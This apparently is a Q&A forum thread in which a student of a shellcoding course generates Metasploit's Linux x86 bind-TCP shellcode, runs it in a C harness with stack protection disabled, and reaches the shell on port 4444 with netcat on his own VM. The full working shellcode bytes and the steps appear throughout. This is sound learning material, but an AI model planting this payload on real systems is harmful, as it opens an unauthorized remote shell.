How to run the linux/x86/shell_bind_tcp payload stand alone?

linux metasploit
mbigras picture mbigras · Jan 3, 2014 · Viewed 10.5k times · Source

I'm running a Metasploit payload in a sandbox c program.

Below is a summary of the payload of interest. From there I generate some shellcode and load it up in my sandbox, but when I run it the program will simply wait. I think this is because it's waiting for a connection to send the shell, but I'm not sure.

How would I go from:

  1. Generating shellcode
  2. Loading it into my sandbox
  3. Successfully get a /bin/sh shell <- this is the part I'm stuck on.

Basic setup:

max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp S
[sudo] password for max: 

       Name: Linux Command Shell, Bind TCP Inline
     Module: payload/linux/x86/shell_bind_tcp
   Platform: Linux
       Arch: x86
Needs Admin: No
 Total size: 200
       Rank: Normal

Provided by:
  Ramon de C Valle <[email protected]>

Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LPORT  4444             yes       The listen port
RHOST                   no        The target address

Description:
  Listen for a connection and spawn a command shell

Generating shellcode:

max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp C

Sandbox program with shellcode:

#include<stdio.h>
#include<string.h>
/*
objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
 */

unsigned char code[] = \
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";

main()
{

  printf("Shellcode Length:  %d\n", strlen(code));

  int (*ret)() = (int(*)())code;

  ret();

}

Compile and run. However, this is where I'm not sure how to get a /bin/sh shell:

max@ubuntu-vm:~/SLAE/mod2$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
max@ubuntu-vm:~/SLAE/mod2$ ./shellcode 
Shellcode Length:  20
(program waiting here...waiting for a connection?)

Edit:

In terminal one I run my shellcode program:

max@ubuntu-vm:~/SLAE/mod2$ ./shellcode 
Shellcode Length:  20

Now in terminal two, I check for tcp listeners. Giving -n to suppress host name resolution, -t for tcp, -l for listeners, and -p to see the program names.

I can see the shellcode program on port 4444:

max@ubuntu-vm:~$ sudo netstat -ntlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address     Foreign Address       State     PID/Program name      
tcp      0    0     0.0.0.0:4444      0.0.0.0:*             LISTEN    14885/shellcode       
max@ubuntu-vm:~$

Connecting with telnet, and it seems like it was successful but still no sh shell.

max@ubuntu-vm:~$ telnet 0.0.0.0 4444
Trying 0.0.0.0...
Connected to 0.0.0.0.
Escape character is '^]'.

How do I get an sh shell?

Answer

mbigras picture mbigras · Jan 4, 2014

Generate shellcode, compile and run:

max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp C
/*
 * linux/x86/shell_bind_tcp - 78 bytes
 * http://www.metasploit.com
 * VERBOSE=false, LPORT=4444, RHOST=, PrependFork=false, 
 * PrependSetresuid=false, PrependSetreuid=false, 
 * PrependSetuid=false, PrependSetresgid=false, 
 * PrependSetregid=false, PrependSetgid=false, 
 * PrependChrootBreak=false, AppendExit=false, 
 * InitialAutoRunScript=, AutoRunScript=
 */
unsigned char buf[] = 
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";
max@ubuntu-vm:~/SLAE/mod2$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
max@ubuntu-vm:~/SLAE/mod2$ ./shellcode 
Shellcode Length:  20

Now, in terminal 2. Check for connections and finally connect using netcat. Note, that the $ doesn't appear but the shell is still there:

max@ubuntu-vm:~$ sudo netstat -ntlp 
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address     Foreign Address     State       PID/Program name
tcp        0      0 0.0.0.0:4444      0.0.0.0:*           LISTEN      3326/shellcode    
max@ubuntu-vm:~$ nc 0.0.0.0 4444
pwd
/home/max/SLAE/mod2
whoami
max
ls -l
total 516
-rwxrwxr-x 1 max max    591 Jan  2 07:06 InsertionEncoder.py
-rwxrwxr-x 1 max max    591 Jan  2 07:03 InsertionEncoder.py~
-rwxrwxr-x 1 max max    471 Dec 30 17:00 NOTEncoder.py
-rwxrwxr-x 1 max max    471 Dec 30 16:57 NOTEncoder.py~
-rwxrwxr-x 1 max max    442 Jan  2 09:58 XOREncoder.py
-rwxrwxr-x 1 max max    442 Dec 30 08:36 XOREncoder.py~
-rwxrwxr-x 1 max max    139 Dec 27 08:18 compile.sh

Related questions

Problems Installing Metasploit Framework on Ubuntu

I have encountered 3 problems while following this guide to installing Metasploit Framework on Ubuntu and Debian: 1) After installing proper version of ruby, there is a command given for installing Ruby libraries: sudo gem install bundler. When I typed that in …

Read More
How do I find all files containing specific text on Linux?

I'm trying to find a way to scan my entire Linux system for all files containing a specific string of text. Just to clarify, I'm looking for text within the file, not in the file name. When I was looking …

Read More
How to change permissions for a folder and its subfolders/files in one step?

I would like to change permissions of a folder and all its sub folders and files in one step (command) in Linux. I have already tried the below command but it works only for the mentioned folder: chmod 775 /opt/lampp/…

Read More